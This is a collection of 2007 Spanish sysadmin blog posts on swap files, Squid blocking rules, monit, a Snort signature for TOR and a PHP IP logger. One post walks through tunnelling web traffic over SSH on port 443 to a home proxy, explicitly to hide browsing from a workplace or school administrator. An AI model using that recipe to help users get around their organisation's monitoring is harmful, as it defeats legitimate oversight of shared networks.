Si no parcheamos el kernel y lo recompilamos, hoy por hoy solo se puede hibernar (suspender a disco) con una partición swap, usando swsusp, de serie en todos los kernel > 2.6. Si lo parcheamos usando suspend2, que es una version mas evolucionada podremos suspender a disco en un archivo, y muchas otras cosas como cifrado, compresion de la imagen guardada...

De hecho existe un paquete por ahi, llamado dphys-swapfile que contiene un script que lo que hace es crear y activar un archivo swap al arrancar, de un tamaño apropiado para nuestro sistema. La ventaja de que se cree dinamicamente es que la swap sera automaticamente cambiada de tamaño si aumentamos la RAM del equipo, sin necesidad de que nos acordemos de hacerlo manualmente.

Asi que, aunque tengamos 2GB de RAM puede seguir interesandonos tener swap, bien en una particion, bien en un archivo.

Navegar anonimamente desde tu trabajo o centro de estudios

2007-10-22T10:20:00.005+02:00

Cualquier administrador decente tendra implementado un sistema de logs para saber que paginas visita cada usuario. Si no quieres que desde tu trabajo o universidad o instituto sepan que paginas visitas, o si quieres acceder a webs sin restricciones, puede que con este hack puedas burlar los controles del administrador.

Primero necesitaras la IP publica de tu casa y de tu trabajo/facultad. Ve a http://www.whatismyip.com y apunta esas 2 IPs.

En tu casa

Instala Apache desde esta pagina si usas windows.

Si usas Gentoo Linux o Debian-like GNU/Linux instala Apache asi:

emerge apache2
apt-get install apache2

respectivamente.

Instala OpenSSH.

Si usas Windows, ve a http://sshwindows.sourceforge.net/

Si usas Gentoo Linux o Debian-like GNU/Linux:

emerge openssh
apt-get install openssh

Pasemos a configurar Apache y OpenSSH:

Apache. Edita el httpd.conf:

Quita el comentario # a las lineas:

LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_connect_module modules/mod_proxy_connect.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule proxy_ftp_module modules/mod_proxy_ftp.so

Cambia la linea

Listen 80

por

Listen 8080

Luego para que solo tu puedas usar tu proxy, busca la seccion

#
# Controls who can get stuff from this server.
#
Order allow,deny
Allow from all

y cambiala por

#
# Controls who can get stuff from this server.
#
Order deny,allow
Deny from all
Allow from 127.0.0.1

Por ultimo en la seccion de VirtualHost añade lo siguiente:

<IfModule mod_proxy.c>

ProxyRequests On

<Proxy *>
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Proxy>

# If you plan to use mIRC, uncomment the following line
#AllowCONNECT 6666 6667 6668

</IfModule>

OpenSSH:

Tanto en Windows como en Linux cambiaremos el puerto por defecto 22 por el 443. Esto lo haremos porque el administrador puede haber filtrado y prohibido el puerto 22, pero no el 443, que es el usado para conexiones https.

En Windows cambia en el archivo etc\sshd_config a partir de donde tengas instalado OpenSSH:

la linea

#Port 22

por

Port 443

En UNIX/Linux, lo mismo pero teniendo en cuenta que el archivo de configuracion cuelga de /etc

En Windows aun tenemos que ir al directorio bin desde donde tengamos instalado OpenSSH y ejecutar estos comandos:

mkgroup -l > ..\etc\group
mkpasswd -l > ..\etc\passwd

Con esto crearemos user/pass en etc

Para iniciar los servicios en Windows:

net start opensshd
net stop apache2.2
net start apache2.2

Si queremos que ambos servicios se ejecuten al inicio, ejecutaremos services.msc y los configuraremos en Automatico.

Para iniciar los servicios en Linux:

/etc/init.d/openssh restart
/etc/init.d/apache2 restart

Para añadirlos al inicio en Gentoo Linux:

rc-update add openssh default
rc-update add apache2 default

En otros UNIX/Linux, configurar /etc/rc.d

En el router redirigir el puerto 443 con NAT+PAT a la IP del equipo de casa puerto 443.

Ya tenemos configurado nuestro equipo de casa. Ahora en el trabajo necesitaremos el Putty si usamos Windows:

putty -L 80:127.0.0.1:8080 -ssh IP_Casa -P 443

Con esto habremos creado un tunel SSH entre el ordenador del trabajo y el de casa.

Si no tienes privilegios para guardar el putty en el disco duro, llevalo en un diskette o en un CD. Es solo un ejecutable que no necesita instalacion.

Solo nos falta decirle al navegador que use como proxy 127.0.0.1 puerto 80.

El hack funcionara asi:

En el trabajo pedimos una pagina web. Nos conectaremos por el tunel SSH al router de nuestra casa. El router de nuestra casa redirigira la peticion a nuestro ordenador de la LAN de casa al puerto 443, donde tenemos a OpenSSH escuchando. OpenSSH redirige la peticion al servidor Apache del ordenador de casa. Apache pide la pagina web. Sale la peticion por nuestro router de casa. Nuestro router de casa devuelve la peticion al servidor Apache que corre en nuestro ordenador de casa. Apache pasa la peticion al servidor OpenSSH de nuestro ordenador de casa. Este manda la peticion a nuestro ordenador del trabajo a traves de nuestro router de casa. Nuestro ordenador del trabajo recibe la peticion y el navegador de nuestro ordenador del trabajo nos muestra la pagina.

Y el administrador cuando vea los logs no sabra que paginas hemos visitado, solo podra ver que hemos hecho peticiones a un puerto 443, y todo el contenido le saldra cifrado, por lo que no entendera nada.

Obteniendo datos de un visitante y guardarlos en un archivo de texto

2007-10-11T11:00:00.001+02:00

Mucha gente cree que para guardar logs de nuestros visitantes necesitamos tener alojada nuestra pagina en un servidor web como Apache, bien en nuestro equipo o en un servidor dedicado en el que tengamos acceso de root al servidor web para modificar la configuracion. Esta claro que asi tenemos muchas mas posibilidades, pero podemos implementar facilmente en PHP un sistema de logs sencillo.

Por ejemplo, para guardar las IPs publicas de nuestros visitantes en el archivo ip.txt

<?php
if(getenv(HTTP_X_FORWARDED_FOR)) {
$ip = getenv(HTTP_X_FORWARDED_FOR); }
elseif(getenv(HTTP_CLIENT_IP)) {
$ip = getenv(HTTP_CLIENT_IP); }
else { $ip = $REMOTE_ADDR; }
$txt = @fopen("ip.txt", "a");
fputs($txt, " IP:".$ip);
fclose($txt);
echo "Tu IP publica es: $ip";
?>

No tiene ningun misterio.

Con $txt = @fopen("ip.txt", "a"); abrimos en modo append el archivo ip.txt.

Con fputs($txt, " IP:".$ip); añadimos la IP a ese archivo de texto.

Con fclose($txt); cerramos ese archivo de texto.

Algunos hacks que tengo en mi Gentoo para ahorrar tecleos y demas

2007-10-04T16:53:00.002+02:00

*Odio escribir continuamente /etc/init.d/... asi que en mi .bashrc tengo el siguiente alias:

for service in `cd /etc/init.d/; ls`
do
alias "rc${service}"="/etc/init.d/${service}"
done

*Odio escribir siempre nano -w archivo.txt y quiero tener un TAB de tamaño 4asi que en /etc/nanorc tengo:

set nowrap
set tabsize 4

*Para usar emerge:

alias akmerge="ACCEPT_KEYWORDS='~x86' /usr/bin/sudo /usr/bin/emerge -pv"

*¿Cuantas veces has creado un directorio y el siguiente comando ha sido para entrar en el? Para hacer las 2 cosas en 1 comando:

md () {
mkdir -p $1 && cd $1
}

*Capturar pantalla en fluxbox con la tecla Impr Pant:

Editar ~/.fluxbox/keys

None F15 :execCommand import -w root ~/`date +%Y%m%d%H%M`.png

Y tendras un archivo PNG en formato YYYYMMDDHHmm.PNG

*Un hack poco conocido (opcion indocumentada en la pagina de manual). Si quieres copiar archivos con el progreso de copia:

cp -g

Al parecer solo funciona en gentoo.

*¿Estas harto del beep de tu maquina cuando usas el TAB-completion?

xset b off

Monitorizacion de sistemas UNIX con monit

2007-10-04T10:06:00.004+02:00

monit es un potente software de monitorizacion de sistemas UNIX. La pagina oficial del proyecto es http://www.tildeslash.com/monit/

Esta en el Portage de Gentoo.

Como ejemplo voy a mostrar un archivo de configuracion /etc/monitrc , con alertas por mail, monitorizacion en mi caso de Squid, etc.

#Start monit in background (run as daemon) and check the services at 2-minute intervals.
set daemon  120

#Set syslog logging with the 'daemon' facility
set logfile syslog facility log_daemon

#Set list of mailservers for alert delivery
set mailserver nuestro.servidor.sendmail

set eventqueue #si el servidor de correo esta caido...
basedir /var/monit #...los eventos se guardan aqui...
slots 1000 #...con este tamaño de cola

#configuramos el remitente
set mail-format { from: operador@nuestro.cliente.es }

#configuramos el/los destinatario/s
set alert sistemas@nosotros.com with reminder on 10 cycles

#Monitorizamos el Squid
#si se cae, que se inicie
check process squid with pidfile /var/run/squid.pid
start program = "/etc/rc.d/init.d/squid start"
stop program = "/etc/rc.d/init.d/squid stop"
#si cpu>60% por 2 ciclos, que avise
if cpu > 60% for 2 cycles then alert
#si cpu>80% por 5 ciclos, que reinicie
if cpu > 80% for 5 cycles then restart
#si totalmen>32.0 MB por 5 ciclos, que reinicie
if totalmem > 32.0 MB for 5 cycles then restart

#Si el espacio en disco usado por Squid supera el 90%, que avise
check device raiz_y_cache_squid with path /dev/md0
if space usage > 90% then alert

Con este ejemplo creo que se ven mas o menos las enormes posibilidades de monit.

Un punto a aclarar es que si queremos hacer modificaciones de daemons monitorizados con monit, primero tenemos que bajar temporalmente el monit con

service rc.monit stop

luego hacer las modificaciones en los daemons monitorizados que queramos modificar

y por ultimo volver a levantar el monit

service rc.monit start

Esto es asi porque si monit detecta que bajamos un daemon, automaticamente lo levantara, y nosotros no queremos eso.

Detectando el uso de TOR en nuestra red

2007-10-03T17:50:00.003+02:00

TOR usa SSL. SSL usa certificados firmados. TOR firma los certificados distribuidos a los clientes TOR.

Jugando con Ethereal podemos llegar a la conclusion de que este filtro:

x509sat.DirectoryString == "TOR"

funciona bien detectando la negociacion SSL de TOR

A partir de esto podemos crear una firma de Snort tal que asi:

alert tcp $HOME_NET any -> any any (msg:"TOR_detected"; content:"|06 03 55 04 0a 13 03 54 4f 52|"; sid:9996; priority:3;)

Javascript para detectar el uso de Privoxy

2007-10-03T17:36:00.002+02:00

<script>
var em = document.getElementById("privoxy");
var color = document.defaultView.getComputedStyle(em,null).getPropertyValue("color");        
if (color == "rgb(255, 0, 0)") {            
alert("Estas usando Privoxy");
} else {
alert("No estas usando Privoxy");
} 
</script>

Navegacion segura con Squid y SSH

2007-10-01T12:48:00.003+02:00

En UNIX:

ssh -L 3128:127.0.0.1:3128 SSH_Server -f -N

En Windows:

Bajamos Plink, que es una version en linea de comandos del cliente SSH Putty.

plink.exe -batch -N -l UserName -pw Password -L 3128:127.0.0.1:3128 SSH_Server

Y ya solo nos queda configurar nuestro navegador para que use el tunel SSH como proxy en la direccion IP 127.0.0.1 y puerto 3128

Squid: Bloquear determinadas extensiones

2007-10-01T12:33:00.002+02:00

Si no queremos que los usuarios se bajen por ejemplo archivos con extension mp3, avi, mpg y mpeg, crearemos un archivo con estas extensiones, que residira por ejemplo en /etc/squid/blocks.files.acl y que contendra lo siguiente:

\.[Mm][Pp]3$
\.[Aa][Vv][Ii]$
\.[Mm][Pp][Gg]$
\.[Mm][Pp][Ee][Gg]$

Luego crearemos un archivo HTML que contendra el error que le mostraremos al usuario cuando intente bajarse alguna de estas extensiones, por ejemplo en /etc/squid/error/err_blocked_files

<HTML>
<HEAD>
<TITLE>ERROR: Archivo bloqueado</TITLE>
</HEAD>
<BODY>
<H1>El archivo ha sido bloqueado debido a la nueva politica de seguridad</H1>
<p>Si cree que necesita este archivo contacte con el administrador:</p>
Telf: 777777 (ext 7)<br>
Email: vlan7@midominio.com

Es importante no cerrar el codigo HTML con las etiquetas de cierre </BODY> y </HTML>, pues Squid ya se encarga de cerrarlas.

Ahora nos queda el paso final, y es editar el archivo de configuracion de Squid en /etc/squid/squid.conf

#Denegar extensiones bloqueadas
deny_info err_blocked_files blockfiles
http_access deny blockfiles
#ultima linea
http_access allow all

Squid: Bloquear un puerto

2007-10-01T12:27:00.002+02:00

Supongamos que quieres bloquear el puerto del MSN messenger. Edita el archivo de configuracion de Squid /etc/squid/squid.conf

acl block_port port 1863
http_access deny block_port
#ultima linea
http_access allow all

Si por ejemplo no quieres que se aplique esta restriccion a ti, suponiendo que tu IP sea 192.168.1.7

acl block_port port 1863
acl no_block_port_ip src 192.168.1.7
http_access deny block_port !no_block_port_ip
http_access allow all

Una vez cambiada la configuracion reiniciaremos Squid:

/etc/init.d/squid restart

Squid: Bloquear URLs

2007-10-01T12:21:00.002+02:00

Si por ejemplo quieres bloquear todas las URLs del dominio blogspot.com, editar el archivo /etc/squid/squid.conf y añadir en Access Controls la siguiente ACL:

acl blocksites dstdomain .blogspot.com
http_access deny blocksites
#ultima linea
http_access allow all

Si lo que quieres es bloquear todas las URLs que contengan la palabra sex [maldito censurador!]:

acl blockregexurl url_regex -i sex
http_access deny blockregexurl
#ultima linea
http_access allow all

Despues reinicia squid:

/etc/init.d/squid restart

Bug en Excel 2007

2007-09-27T13:35:00.001+02:00

Excel 2007 no sabe multiplicar:

El resultado correcto de todas las multiplicaciones deberia ser 65.535

Sin comentarios...

Chris Lomont aclara absolutamente todo lo ocurrido AQUI.

En la pagina 15 viene la explicacion. El fallo se da cuando EAX contiene xFFFF. Ocurre porque cuando se produce desbordamiento en registro EBX, hay un incremento de EAX. El incremento en 16 bits (INC AX) no se comporta exactamente igual al incremento en 32 bits (INC EAX) y el resultado es un error en un salto posterior.